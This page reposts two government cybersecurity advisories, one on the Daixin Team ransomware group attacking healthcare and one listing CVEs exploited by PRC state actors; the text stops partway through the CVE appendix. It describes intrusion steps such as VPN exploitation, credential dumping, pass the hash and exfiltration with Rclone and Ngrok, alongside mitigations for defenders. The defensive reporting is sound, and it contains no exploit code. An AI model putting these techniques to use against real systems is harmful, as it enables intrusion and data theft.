Tag Archives: Security

AA22-294A: #StopRansomware: Daixin Team

This post was originally published on this site

Original release date: October 21, 2022

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.

Download the PDF version of this report: pdf, 591 KB

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Cybercrime actors routinely target HPH Sector organizations with ransomware:

  • As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.
  • According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.

The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

  • Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
  • Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [T1190]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [T1078] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [T1598.002].

After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [T1563.001] and Remote Desktop Protocol (RDP) [T1563.002]. Daixin actors have sought to gain privileged account access through credential dumping [T1003] and pass the hash [T1550.002]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [T1098] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [T1486] on those servers. 

According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. A ransom note is also written to /vmfs/volumes/. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. Figure 3 and Figure 4 include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”

Figure 1: Daixin Team – Ransomware Targeted File Path

Figure 2: Daixin Team – Ransomware Targeted File Extensions

Figure 3: Example 1 of Daixin Team Ransomware Note

Figure 4: Example 2 of Daixin Team Ransomware Note

In addition to deploying ransomware, Daixin actors have exfiltrated data [TA0010] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used Ngrok—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [T1567].

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 for all referenced threat actor tactics and techniques included in this advisory.

Table 1: Daixin Actors’ ATT&CK Techniques for Enterprise

Reconnaissance

Technique Title

ID

Use

Phishing for Information: Spearphishing Attachment

T1598.002

Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.

Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.

Valid Accounts

T1078

Daixin actors use previously compromised credentials to access servers on the target network.

Persistence

Technique Title

ID

Use

Account Manipulation

T1098

Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.

Credential Access

Technique Title

ID

Use

OS Credential Dumping

T1003

Daixin actors have sought to gain privileged account access through credential dumping.

Lateral Movement

Technique Title

ID

Use

Remote Service Session Hijacking: SSH Hijacking

T1563.001

Daixin actors use SSH and RDP to move laterally across a network.

Remote Service Session Hijacking: RDP Hijacking

T1563.002

Daixin actors use RDP to move laterally across a network.

Use Alternate Authentication Material: Pass the Hash

T1550.002

Daixin actors have sought to gain privileged account access through pass the hash.

Exfiltration

Technique Title

ID

Use

Exfiltration Over Web Service

T1567

Daixin Team members have used Ngrok for data exfiltration over web servers.

Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

INDICATORS OF COMPROMISE

See Table 2 for IOCs obtained from third-party reporting.

Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes

File

SHA256

rclone-v1.59.2-windows-amd64git-log.txt

9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238

rclone-v1.59.2-windows-amd64rclone.1

19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD

rclone-v1.59.2-windows-amd64rclone.exe

54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939

rclone-v1.59.2-windows-amd64README.html

EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF

rclone-v1.59.2-windows-amd64README.txt

475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28

Mitigations

FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:

  • Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).
  • Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
  • Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
  • Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.
  • Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
  • Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TPS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
  • Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
  • Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
  • Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
  • Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
  • In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
    • Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
      • Refer to applicable state data breach laws and consult legal counsel when necessary.
      • For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
    • See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.

Mitigating and Preventing Ransomware

  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs.
  • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the National Institute of Standards and Technology’s (NIST’s) Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software.
  • Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Consider adding an email banner to messages coming from outside your organizations.
  • Disable hyperlinks in received emails.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

  • Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • Follow the notification requirements as outlined in your cyber incident response plan.
  • Report incidents to the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

REFERENCES

  • Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
  • Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
  • No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
  • Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3
  • For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov 

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at cisa.gov/report.

ACKNOWLEDGEMENTS

FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

  • Initial Publication: October 21, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

AA22-279A: Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors

This post was originally published on this site

Original release date: October 6, 2022

Summary

This joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People’s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.

This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

NSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage, FBI’s Industry Alerts, and NSA’s Cybersecurity Advisories & Guidance

Download the PDF version of this report: pdf, 409 KB

Technical Details

NSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.

PRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.

Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020

Vendor

CVE

Vulnerability Type

Apache Log4j

CVE-2021-44228

Remote Code Execution

Pulse Connect Secure

CVE-2019-11510

Arbitrary File Read

GitLab CE/EE

CVE-2021-22205

Remote Code Execution

Atlassian

CVE-2022-26134

Remote Code Execution

Microsoft Exchange

CVE-2021-26855

Remote Code Execution

F5 Big-IP

CVE-2020-5902

Remote Code Execution

VMware vCenter Server

CVE-2021-22005

Arbitrary File Upload

Citrix ADC

CVE-2019-19781

Path Traversal

Cisco Hyperflex

CVE-2021-1497

Command Line Execution

Buffalo WSR

CVE-2021-20090

Relative Path Traversal

Atlassian Confluence Server and Data Center

CVE-2021-26084

Remote Code Execution

Hikvision Webserver

CVE-2021-36260

Command Injection

Sitecore XP

CVE-2021-42237

Remote Code Execution

F5 Big-IP

CVE-2022-1388

Remote Code Execution

Apache

CVE-2022-24112

Authentication Bypass by Spoofing

ZOHO

CVE-2021-40539

Remote Code Execution

Microsoft

CVE-2021-26857

Remote Code Execution

Microsoft

CVE-2021-26858

Remote Code Execution

Microsoft

CVE-2021-27065

Remote Code Execution

Apache HTTP Server

CVE-2021-41773

Path Traversal

These state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.

Mitigations

NSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.

  • Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.
  • Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. 
  • Block obsolete or unused protocols at the network edge. 
  • Upgrade or replace end-of-life devices.
  • Move toward the Zero Trust security model. 
  • Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.
     

Appendix A

Table II: Apache CVE-2021-44228

Apache CVE-2021-44228 CVSS 3.0: 10 (Critical)

Vulnerability Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Recommended Mitigations

  • Apply patches provided by vendor and perform required system updates.

Detection Methods

Vulnerable Technologies and Versions

There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check https://nvd.nist.gov/vuln/detail/CVE-2021-44228.

Table III: Pulse CVE-2019-11510

Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical)

Vulnerability Description

This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability.

Recommended Mitigations

  • Apply patches provided by vendor and perform required system updates.

Detection Methods

  • Use CISA’s “Check Your Pulse” Tool.

Vulnerable Technologies and Versions

Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

Table IV: GitLab CVE-2021-22205

GitLab CVE-2021-22205 CVSS 3.0: 10 (Critical)

Vulnerability Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution.

Recommended Mitigations

  • Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.
  • Hotpatch is available via GitLab.

Detection Methods

  • Investigate logfiles.
  • Check GitLab Workhorse.

Vulnerable Technologies and Versions

Gitlab CE/EE.

Table V: Atlassian CVE-2022-26134

Atlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1.

Recommended Mitigations 

  • Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. 
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.
  • Short term workaround is provided here.

Detection Methods

N/A

Vulnerable Technologies and Versions

All supported versions of Confluence Server and Data Center

Confluence Server and Data Center versions after 1.3.0

Table VI: Microsoft CVE-2021-26855

Microsoft CVE-2021-26855                                                     CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Microsoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor  who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity.

Recommended Mitigations

  • Apply the appropriate Microsoft Security Update.
  • Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)
  • Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)
  • Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)
  • Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)
  • Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)
  • Restrict untrusted connections.

Detection Methods

  • Analyze Exchange product logs for evidence of exploitation.
  • Scan for known webshells.

Vulnerable Technologies and Versions

Microsoft Exchange 2013, 2016, and 2019.

Table VII: F5 CVE-2020-5902

F5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Recommended Mitigations

  • Apply FY BIG-IP Update.
  • Restrict access to the configuration utility.

Detection Methods

Vulnerable Technologies and Versions

F5 Big-IP Access Policy Manager

F5 Big-IP Advanced Firewall Manager

F5 Big-IP Advanced Web Application Firewall

F5 Big-IP Analytics

F5 Big-IP Application Acceleration Manager

F5 Big-IP Application Security Manager

F5 Big-IP Ddos Hybrid Defender

F5 Big-IP Domain Name System (DNS)

F5 Big-IP Fraud Protection Service (FPS)

F5 Big-IP Global Traffic Manager (GTM)

F5 Big-IP Link Controller

F5 Networks Big-IP Local Traffic Manager (LTM)

F5 Big-IP Policy Enforcement Manager (PEM)

F5 SSL Orchestrator

References

https://support.f5.com/csp/article/K00091341

https://support.f5.com/csp/article/K07051153

https://support.f5.com/csp/article/K20346072

https://support.f5.com/csp/article/K31301245

https://support.f5.com/csp/article/K33023560

https://support.f5.com/csp/article/K43638305

https://support.f5.com/csp/article/K52145254

https://support.f5.com/csp/article/K82518062

Table VIII: VMware CVE-2021-22005

VMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.

Recommended Mitigations

  • Apply Vendor Updates.

Detection Methods

N/A

Vulnerable Technologies and Versions

VMware Cloud Foundation

VMware VCenter Server

Table IX: Citrix CVE-2019-19781

Citrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Recommended Mitigations

Detection Methods

N/A

Vulnerable Technologies and Versions

Citrix ADC, Gateway, and SD-WAN WANOP

Table X: Cisco CVE-2021-1497

Cisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory.

Recommended Mitigations

  • Apply Cisco software updates.

Detection Methods

  • Look at the Snort Rules provided by Cisco.

Vulnerable Technologies and Versions

Cisco Hyperflex Hx Data Platform 4.0(2A)

Table XI: Buffalo CVE-2021-20090

Buffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication.

Recommended Mitigations

  • Update firmware to latest available version.

 

Detection Methods

  • N/A

Vulnerable Technologies and Versions

Buffalo Wsr-2533Dhpl2-Bk Firmware

Buffalo Wsr-2533Dhp3-Bk Firmware

Table XII: Atlassian CVE-2021-26084

Atlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5.

Recommended Mitigations

  • Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.
  • Avoid using end-of-life devices.
  • Use Intrusion Detection Systems (IDS).

Detection Methods

N/A

Vulnerable Technologies and Versions

Atlassian Confluence

Atlassian Confluence Server

Atlassian Data Center

Atlassian Jira Data Center

Table XIII: Hikvision CVE-2021-36260

Hikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands.

Recommended Mitigations

  • Apply the latest firmware updates.

Detection Methods

N/A

Vulnerable Technologies and Versions

Various Hikvision Firmware to include Ds, Ids, and Ptz

References

https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260  

Table XIV: Sitecore CVE-2021-42237

Sitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

Recommended Mitigations

  • Update to latest version.
  • Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx.

Detection Methods

  • N/A

Vulnerable Technologies and Versions

Sitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2

Sitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7

Sitecore Experience Platform 8.0 Service Pack 1

Sitecore Experience Platform 8.1, and  Update 1-Update 3

Sitecore Experience Platform 8.2, and Update 1-Update 7

Table XV: F5 CVE-2022-1388

F5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Recommended Mitigations

  • Block iControl REST access through the self IP address.
  • Block iControl REST access through the management interface.
  • Modify the BIG-IP httpd configuration.

Detection Methods

N/A

Vulnerable Technologies and Versions

Big IP versions:

16.1.0-16.1.2

15.1.0-15.1.5

14.1.0-14.1.4

13.1.0-13.1.4

12.1.0-12.1.6

11.6.1-11.6.5

Table XVI: Apache CVE-2022-24112

Apache CVE-2022-24112 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

A malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX’s data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.

Recommended Mitigations

  • In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.
  • Update to 2.10.4 or 2.12.1.

Detection Methods

N/A

Vulnerable Technologies and Versions

Apache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)

LTS versions of Apache APISIX between 2.10.0 and 2.10.4

Table XVII: ZOHO CVE-2021-40539

ZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

Recommended Mitigations

  • Upgrade to latest version.

Detection Methods

  • Run ManageEngine’s detection tool.
  • Check for specific files and logs.

Vulnerable Technologies and Versions

Zoho Corp ManageEngine ADSelfService Plus

Table XVIII: Microsoft CVE-2021-26857

Microsoft CVE-2021-26857 CVSS 3.0: 7.8 (High)

Vulnerability Description

Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.

Recommended Mitigations

  • Update to support latest version.
  • Install Microsoft security patch.
  • Use Microsoft Exchange On-Premises Mitigation Tool.

Detection Methods

  • Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.
  • Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log.

Vulnerable Technologies and Versions

Microsoft Exchange Servers

Table XIX: Microsoft CVE-2021-26858

Microsoft CVE-2021-26858 CVSS 3.0: 7.8 (High)

Vulnerability Description

Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.

Recommended Mitigations

  • Update to support latest version.
  • Install Microsoft security patch.
  • Use Microsoft Exchange On-Premises Mitigation Tool.

Detection Methods

Vulnerable Technologies and Versions

Microsoft Exchange Servers

Table XX: Microsoft CVE-2021-27065

Microsoft CVE-2021-27065 CVSS 3.0: 7.8 (High)

Vulnerability Description

Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.

Recommended Mitigations

  • Update to support latest version.
